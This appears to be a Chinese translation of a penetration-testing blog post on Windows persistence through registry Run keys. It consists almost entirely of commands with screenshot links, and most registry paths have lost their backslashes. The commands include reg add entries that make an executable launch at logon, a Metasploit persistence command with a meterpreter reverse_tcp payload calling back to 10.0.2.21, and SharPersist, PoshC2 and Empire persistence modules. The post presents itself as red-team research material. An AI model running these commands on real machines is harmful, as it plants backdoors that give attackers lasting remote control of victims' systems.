译文声明:本文由Bypass整理并翻译,仅用于安全研究和学习之用。 原文地址:https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/
命令行
reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun" /v Pentestlab /t REG_SZ /d "C:Userspentestlabpentestlab.exe" reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce" /v Pentestlab /t REG_SZ /d "C:Userspentestlabpentestlab.exe" reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunServices" /v Pentestlab /t REG_SZ /d "C:Userspentestlabpentestlab.exe" reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunServicesOnce" /v Pentestlab /t REG_SZ /d "C:Userspentestlabpentestlab.exe"
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462872.jpg)
reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun" /v Pentestlab /t REG_SZ /d "C:tmppentestlab.exe" reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce" /v Pentestlab /t REG_SZ /d "C:tmppentestlab.exe" reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices" /v Pentestlab /t REG_SZ /d "C:tmppentestlab.exe" reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesOnce" /v Pentestlab /t REG_SZ /d "C:tmppentestlab.exe"
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-15734628721.jpg)
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462872.jpeg)
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnceEx001" /v Pentestlab /t REG_SZ /d "C:tmppentestlab.exe" reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnceEx001Depend" /v Pentestlab /t REG_SZ /d "C:tmppentestlab.dll"
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462873.png)
Metasploit
run persistence -U -P windows/x64/meterpreter/reverse_tcp -i 5 -p 443 -r 10.0.2.21
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462873.jpg)
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-15734628731.png)
use post/windows/manage/persistence_exe set REXEPATH /tmp/pentestlab.exe set SESSION 2 set STARTUP USER set LOCALEXEPATH C:\tmp run
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462873.jpeg)
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-15734628731.jpeg)
set STARTUP SYSTEM
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462874.jpeg)
SharPersist
SharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c C:tmppentestlab.exe" -k "hkcurun" -v "pentestlab" -m add
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462874.png)
SharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c C:tmppentestlab.exe" -k "hklmrun" -v "pentestlab" -m add -o env
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-15734628741.png)
SharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c pentestlab.exe" -k "hklmrunonce" -v "Pentestlab" -m add SharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c pentestlab.exe" -k "hklmrunonceex" -v "Pentestlab" -m add SharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c pentestlab.exe" -k "hkcurunonce" -v "Pentestlab" -m add
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462875.jpg)
SharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c pentestlab.exe" -k "logonscript" -m add
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462875.png)
PoshC2
install-persistence
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462876.png)
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462876.jpeg)
Empire
HKCU:SOFTWAREMicrosoftWindowsCurrentVersionDebug HKLM:SOFTWAREMicrosoftWindowsCurrentVersionDebug
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462876.jpg)
usemodule persistence/userland/registry usemodule persistence/elevated/registry*
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-15734628761.jpeg)
HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun HKLM:SOFTWAREMicrosoftWindowsCurrentVersionRun
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-15734628761.jpg)
![weinxin](/zone_ci_images/zone.ci.png)
版权声明
本站原创文章转载请注明文章出处及链接,谢谢合作!
评论